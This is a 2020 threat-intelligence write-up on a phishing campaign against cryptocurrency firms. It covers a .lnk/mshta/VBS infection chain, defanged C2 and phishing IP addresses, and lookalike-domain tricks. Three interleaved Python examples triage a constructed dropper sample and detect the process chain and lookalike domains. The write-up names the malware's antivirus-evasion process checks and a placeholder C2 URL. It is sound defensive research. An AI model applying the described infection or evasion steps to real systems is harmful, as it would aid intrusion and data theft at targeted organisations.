APT Group Targeting Cryptocurrency Industries — Debunked

Sentinel Protocol Team
Published in Sentinel Protocol, Sep 18, 2020

By: Athul Harilal (Security Researcher) and Nobel Tan (Head of Engineering & Product)

In this article, we summarize our findings on an APT (Advanced Persistent Threat) group targeting multiple enterprises in the cryptocurrency domain. The APT group uses spear phishing emails to get a foothold on the victim machine, which then downloads multiple payloads from the phishing or C2 server in order to exfiltrate information. Our findings show that the APT group uses separate infrastructure for hosting its phishing and C2 servers, with links to the DPRK-based Lazarus APT group and to the CryptoCore APT group, both involved in compromising multiple cryptocurrency exchanges. We have shared the IOC findings from this research with interested individuals.

Modus Operandi of the APT Group

Fig 1: Modus Operandi

From our investigation, we uncovered 4 stages of operation used by the threat actor group to infect victim machines and exfiltrate information from them.

Stage 1: As shown in Fig 1, victims at cryptocurrency organizations receive a zip file from the threat actor group via a spear phishing email. It contains a password-protected decoy PDF/Word document and a file masquerading as a password file, supposedly containing the password to open the decoy document.

Stage 2: Static analysis of the password file, shown in Fig 2, reveals that it is a Windows shortcut (.lnk) file which contacts the threat actor group's phishing server through a bit[.]ly link executed by the mshta Windows process. The phishing server returns a malicious VBS payload (VBS Payload 1) that is often undetected by antivirus software. The bit[.]ly link also gives the malicious actors some advantages: it reduces suspicion by masking the original link from end users, and it provides click statistics on victims by geographic location.

Fig 2: Static Information of Password.txt.lnk file

Stage 3: Once VBS Payload 1 is obtained from the phishing server, it first generates a Password.txt file containing the password "riskreview", which opens the password-protected decoy PDF document, as shown in Fig 3.

Fig 3: Generating password file from VBS Payload 1

This is followed by extracting the next-stage payload (VBS Payload 2) from its base64-encoded form and storing it in the Windows %TEMP% folder, as shown in Fig 4. It also checks for antivirus processes (kwsprot, npprot, hudongf and qhsafe) in order to evade detection, and uses the result to decide whether to enable its persistence mechanism before exiting.

Fig 4: Getting VBS Payload 2 from VBS Payload 1
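The extraction step just described (a base64-encoded second stage embedded in the first, plus a check for antivirus process names) is the kind of behaviour an analyst can pull out of a VBS dropper statically. The following Python triage script is an added example, not the authors' code and not the actual payload: it scans a script for long base64 runs, decodes those that yield printable text, and reports file writes, the antivirus process names listed above, and any URLs or IP addresses found in either the outer script or the decoded stage. The SAMPLE_DROPPER and STAGE2_STUB strings are constructed stand-ins that only mimic the described behaviour; the 192.0.2.10 address is a documentation placeholder, not an IoC from this article.

```python
import base64
import binascii
import re

# Antivirus process names the article says the dropper checks for before deciding on persistence.
AV_PROCESS_NAMES = ("kwsprot", "npprot", "hudongf", "qhsafe")

# A base64 run long enough to be an embedded script rather than a short token.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# URLs or dotted-quad IPs, in the outer script or in a decoded stage.
_URL_OR_IP = re.compile(r"""https?://[^\s"']+|\b\d{1,3}(?:\.\d{1,3}){3}\b""")
# Files the script creates via the FileSystemObject.
_FILE_WRITE = re.compile(r'CreateTextFile\s*\(\s*"([^"]+)"', re.IGNORECASE)


def _decode_if_text(blob):
    """Return the decoded blob if it is valid base64 of mostly printable text, else None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return text if text and printable / len(text) >= 0.95 else None


def triage_vbs(script_text):
    """Static triage of a VBS dropper: AV checks, file writes, embedded stages, network indicators."""
    lowered = script_text.lower()
    indicators = set(_URL_OR_IP.findall(script_text))
    payloads = []
    for blob in _B64_RUN.findall(script_text):
        decoded = _decode_if_text(blob)
        if decoded is None:
            continue
        stage_indicators = set(_URL_OR_IP.findall(decoded))
        indicators |= stage_indicators
        lines = decoded.splitlines()
        payloads.append({
            "encoded_length": len(blob),
            "decoded_length": len(decoded),
            "network_indicators": sorted(stage_indicators),
            "first_line": lines[0] if lines else "",
        })
    return {
        "av_checks": [name for name in AV_PROCESS_NAMES if name in lowered],
        "files_written": _FILE_WRITE.findall(script_text),
        "writes_to_temp": "%temp%" in lowered,
        "embedded_payloads": payloads,
        "network_indicators": sorted(indicators),
    }


# Constructed stand-in for the second stage; 192.0.2.10 is a documentation address, not an IoC.
STAGE2_STUB = (
    "' constructed second-stage stub standing in for VBS Payload 2\n"
    'c2 = "http://192.0.2.10:8080/"\n'
)

# Constructed sample that only mimics the behaviour described above (not the real dropper).
SAMPLE_DROPPER = (
    "' constructed sample modelled on the described dropper behaviour\n"
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'Set f = fso.CreateTextFile("Password.txt", True)\n'
    'f.Write "riskreview"\n'
    "f.Close\n"
    'stage2 = "' + base64.b64encode(STAGE2_STUB.encode()).decode() + '"\n'
    'tmp = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%")\n'
    'For Each p In GetObject("winmgmts:").InstancesOf("Win32_Process")\n'
    '  If InStr(LCase(p.Name), "kwsprot") > 0 Or InStr(LCase(p.Name), "qhsafe") > 0 Then found = True\n'
    "Next\n"
)

if __name__ == "__main__":
    import json
    print(json.dumps(triage_vbs(SAMPLE_DROPPER), indent=2))
```

The printable-text filter is what separates an embedded script from, say, an embedded binary or an image; a real triage tool would hand non-text blobs to a file-type identifier instead of discarding them.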

Lastly in stage 3, VBS Payload 2 is executed; it contacts the C2 server 140.117.91[.]22 on port 8080 to obtain VBS Payload 3, as shown in Fig 5.

Fig 5: VBS Payload 2 Code snippet
Table 1: Functions of VBS Payload 3 collecting information from the victim machine

Stage 4: VBS Payload 3 is designed to exfiltrate information from the victim machine to the C2 server, as shown in Table 1. To do so, it uses 3 functions, namely getInfo, getUName and getProc. After this information is sent to the C2 server, the returned response is checked for further commands to be executed on the victim machine. If the response begins with "20#" or "23#", the subsequent bytes contain the next commands to be executed on the victim machine, as shown in Fig 6.

Fig 6: Checks on Response from C2 server
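Seen from the endpoint, stages 2 and 3 leave a distinctive process chain: mshta.exe launched with a remote (here, shortened) URL, followed by a script host running a .vbs file out of the user's temp directory. The Python function below is an added example, not part of the article, that runs such logic over constructed process-creation events in the shape of Sysmon Event ID 1 fields (pid, ppid, image, cmdline). The events, paths, PIDs and the bit.ly path are all constructed; a benign local .hta launch and the decoy document being opened are included to show that mshta.exe alone is not the signal.

```python
import re

# Constructed events in the shape of Sysmon Event ID 1 (process creation) fields; all PIDs,
# paths and the shortened-link path are made up for this example.
EVENTS = [
    {"pid": 4001, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # The .lnk in the zip runs mshta with a shortened link (the article's bit[.]ly step).
    {"pid": 4120, "ppid": 4001, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://bit.ly/constructed-link"},
    # The fetched stage writes the next VBS to %TEMP% and runs it with a script host.
    {"pid": 4188, "ppid": 4120, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\stage2.vbs"'},
    # The decoy document being opened; should not fire.
    {"pid": 4200, "ppid": 4001, "image": r"C:\Program Files\Adobe\AcroRd32.exe",
     "cmdline": r'"AcroRd32.exe" "C:\Users\alice\Downloads\Risk Review.pdf"'},
    # A benign local HTA launch; mshta.exe on its own is not the signal.
    {"pid": 4300, "ppid": 4001, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
]

URL_SHORTENERS = ("bit.ly", "bitly.com")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
_REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
_TEMP_DIR = re.compile(r"\\(?:temp|tmp)\\", re.IGNORECASE)
_VBS_FILE = re.compile(r"\.vbs\b", re.IGNORECASE)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_lnk_mshta_vbs_chain(events):
    """Flag mshta.exe fetching a remote URL and script hosts running .vbs out of a temp folder;
    severity is raised when a shortener is involved or when the two are linked parent-to-child."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = _basename(e["image"])
        cmd = e["cmdline"]
        if name == "mshta.exe":
            match = _REMOTE_URL.search(cmd)
            if match:
                url = match.group(0)
                shortened = any(s in url.lower() for s in URL_SHORTENERS)
                findings.append({"pid": e["pid"], "rule": "mshta_remote_url",
                                 "severity": "high" if shortened else "medium",
                                 "detail": url})
        elif name in SCRIPT_HOSTS and _TEMP_DIR.search(cmd) and _VBS_FILE.search(cmd):
            parent = by_pid.get(e["ppid"])
            chained = parent is not None and _basename(parent["image"]) == "mshta.exe"
            findings.append({"pid": e["pid"], "rule": "script_host_vbs_from_temp",
                             "severity": "high" if chained else "medium",
                             "detail": cmd})
    return findings


if __name__ == "__main__":
    for f in detect_lnk_mshta_vbs_chain(EVENTS):
        print(f"{f['severity']:6} {f['rule']:26} pid={f['pid']} {f['detail']}")
```

The parent-child link is what turns two medium-confidence observations into one high-confidence chain; in a real pipeline the same join would be done on process GUIDs rather than PIDs, which are reused.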

Phishing Infrastructure

Table 2: Types of Organizations mimicked by threat actor group

To understand the phishing infrastructure of the APT group, we gathered multiple bit[.]ly links used by the threat actor group and obtained the phishing URLs that the bitly service redirects them to, together with their resolved IP addresses, as shown in Fig 7.

Fig 7: Conversion of bit[.]ly link to phishing url and associated ip address

After obtaining the phishing URLs, we mapped each phishing domain controlled by the threat actor to the original domain controlled by a legitimate organization, in order to understand which types of organizations the threat actors tried to impersonate, as shown in Table 2. It outlines a concise list of organizations that includes cryptocurrency exchanges, cyber security firms, marketing firms and others such as cloud storage firms. The list shows that the threat actor group mimics not only organizations directly involved with cryptocurrency, but also third-party organizations providing services to them.

From our investigation, the threat actor group uses 3 techniques for generating phishing domains similar to the original domain.

  1. Changing the Top Level Domain (TLD): privacyshield[.]gov -> privacyshield[.]services
  2. Minuscule change in the hostname, TLD or both: digifinex[.]com -> digifincx[.]com
  3. Significant but believable change: bli[.]live -> blockchaintransparency[.]institute
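The three techniques above can be turned into a check that a defender runs over newly observed domains (certificate transparency feeds, DNS logs, mail headers) against the list of domains the organization wants protected. The Python classifier below is an added example, not the authors' tooling: it normalizes defanged input, then labels a candidate as a TLD change, a minor edit (Levenshtein distance of at most two), or a significant rebrand that still carries the protected brand's keywords. The PROTECTED table and its keywords are constructed from the three examples in the list, and the TLD split is deliberately simplistic (a real deployment would use the Public Suffix List).

```python
# Protected domains with brand keywords; constructed from the three examples in the list above.
PROTECTED = {
    "privacyshield.gov": ("privacyshield",),
    "digifinex.com": ("digifinex",),
    "bli.live": ("blockchain", "transparency"),
}


def normalize(domain):
    """Accept defanged input such as example[.]com and return a lowercase dotted name."""
    return domain.strip().lower().replace("[.]", ".").strip(".")


def split_host_tld(domain):
    """Simplistic split: last label is the TLD. Real code should consult the Public Suffix List."""
    labels = normalize(domain).split(".")
    return ".".join(labels[:-1]), labels[-1]


def levenshtein(a, b):
    """Edit distance computed with a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_lookalike(candidate, protected=PROTECTED, max_edits=2):
    """Return (category, matched_protected_domain) for a candidate domain."""
    host, tld = split_host_tld(candidate)
    full = f"{host}.{tld}"
    for legit in protected:
        lhost, ltld = split_host_tld(legit)
        if full == legit:
            return ("exact", legit)
        if host == lhost and tld != ltld:
            return ("tld_change", legit)            # technique 1
        if levenshtein(full, legit) <= max_edits:
            return ("minor_edit", legit)            # technique 2
    compact = host.replace("-", "")
    for legit, keywords in protected.items():
        if all(k in compact for k in keywords):
            return ("significant_rebrand", legit)   # technique 3
    return ("no_match", None)


if __name__ == "__main__":
    for c in ("privacyshield[.]services", "digifincx[.]com",
              "blockchaintransparency[.]institute", "example.org"):
        print(c, "->", classify_lookalike(c))
```

Technique 3 is the one that cannot be caught by edit distance at all, which is why the classifier falls back to brand keywords; the keyword list is where most of the tuning effort goes in practice.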

Lastly, although the threat actor group uses a number of domains, they resolve to the small set of IP addresses shown in Table 3. As of writing this article, the threat actor group used hosting providers in the USA and Germany, exposing only port 80 (HTTP) for communication.

Table 3: IP information of Phishing infrastructure

C2 Server Infrastructure

Table 4: IP Information of C2 Infrastructure

From our investigation, we found 3 main entities being used as Command and Control (C2) servers. They differ from the phishing servers in 2 ways. First, these servers have multiple open ports pertaining to services such as VNC, RDP and MS-SQL, as opposed to the single port 80 opened in the phishing infrastructure. Second, we found evidence of some of the entities having been compromised previously, hinting that some of them could belong to legitimate organizations.

Fig 7: Information of entity 128.201.64[.]194 from Shodan

Analysis of entity 128.201.64[.]194 on Shodan¹ showed that it is a Mikrotik router located in Brazil, as shown in Fig 7. In the second half of 2018, more than 200,000 Mikrotik routers were compromised² to run cryptocurrency miners, the majority of them located in Brazil. Affected users found instances of PHP running on the compromised routers, which was later confirmed by Mikrotik officials³. We found similar PHP applications hosted on this entity. Mikrotik routers have also previously been used as a stepping stone to plant spyware inside target organizations, as in Operation Slingshot⁴ uncovered by Kaspersky. These findings lead us to believe that entity 128.201.64[.]194 is possibly a compromised Mikrotik router.

Entities 203.144.133[.]42 and 66.181.166[.]15, on the other hand, had multiple identical services running, such as Microsoft IIS, MS-SQL, Microsoft HTTP-API and RDP/VNC, as of writing this article. We observed intermittent exposure of RDP/VNC services on these entities; such services are commonly used for lateral movement or as a first-stage intrusion⁵ into the target organization. Entity 66.181.166[.]15 was also observed to expose an FTP service from time to time, which could hold information collected from victim machines. However, from our current findings we are unable to conclude whether entities 203.144.133[.]42 and 66.181.166[.]15 are compromised or originally belong to the threat actor group.

Attribution

Based on the indicators of compromise (IOCs) generated from our investigation, we found a number of IOCs matching those in 2 other research articles on threat actor groups targeting cryptocurrency organizations with a modus operandi similar to the one we uncovered.

The first, conducted by the cybersecurity firm ClearSky, attributed them to CryptoCore⁶, which has links to the East European region, Ukraine, Russia or Romania in particular. They revealed that this group targets cryptocurrency exchanges by getting hold of their password manager accounts. Similarly, Group-IB⁷ had also previously reported threat actors using malicious software such as AZORult, Pony Formgrabber and Qbot to obtain the private keys of cryptocurrency wallets. The second, conducted by F-Secure, attributed the threat actor group to the DPRK-based Lazarus group⁸. Although the threat actor group we investigated shares a number of characteristics with the above-mentioned research works, we need more evidence to conclusively establish the attribution.

Acknowledgements

We would like to thank our partner NSHC⁹ for their valuable inputs on this investigation.

[1] “Shodan.io.” https://www.shodan.io/. Accessed 3 Sep. 2020.

[2] “Over 200000 MikroTik Routers Compromised in … — Trend Micro.” 3 Aug. 2018, https://www.trendmicro.com/vinfo/sg/security/news/cybercrime-and-digital-threats/over-200-000-mikrotik-routers-compromised-in-cryptojacking-campaign. Accessed 2 Sep. 2020.

[3] “Mikrotik Routers Compromised……please READ — MikroTik.” 25 Jul. 2018, https://forum.mikrotik.com/viewtopic.php?t=137270. Accessed 2 Sep. 2020.

[4] “Router-Hacking ‘Slingshot’ Spy Operation Compromised More ….” 9 Mar. 2018, https://www.wired.com/story/router-hacking-slingshot-spy-operation-compromised-more-than-100-targets/. Accessed 2 Sep. 2020.

[5] “Fxmsp: “The invisible god of networks” — Group-IB.” https://www.group-ib.com/resources/threat-research/fxmsp-report.html. Accessed 2 Sep. 2020.

[6] “CryptoCore Group — ClearSky Cyber Security.” 24 Jun. 2020, https://www.clearskysec.com/cryptocore-group/. Accessed 2 Sep. 2020.

[7] “2018 Cryptocurrency Exchanges. User Accounts … — Group-IB.” https://www.group-ib.com/resources/threat-research/cryptocurrency-exchanges.html. Accessed 2 Sep. 2020.

[8] “Threat Intelligence Report: Lazarus Group Campaign ….” 25 Aug. 2020, https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical. Accessed 2 Sep. 2020.

[9] “NSHC Security Training.” https://st.nshc.net/en/. Accessed 8 Sep. 2020.

Uppsala Security is headquartered in Singapore and has branch offices in Seoul, South Korea and Tokyo, Japan. Follow Uppsala Security on Telegram, LinkedIn, Twitter, Facebook and Medium.
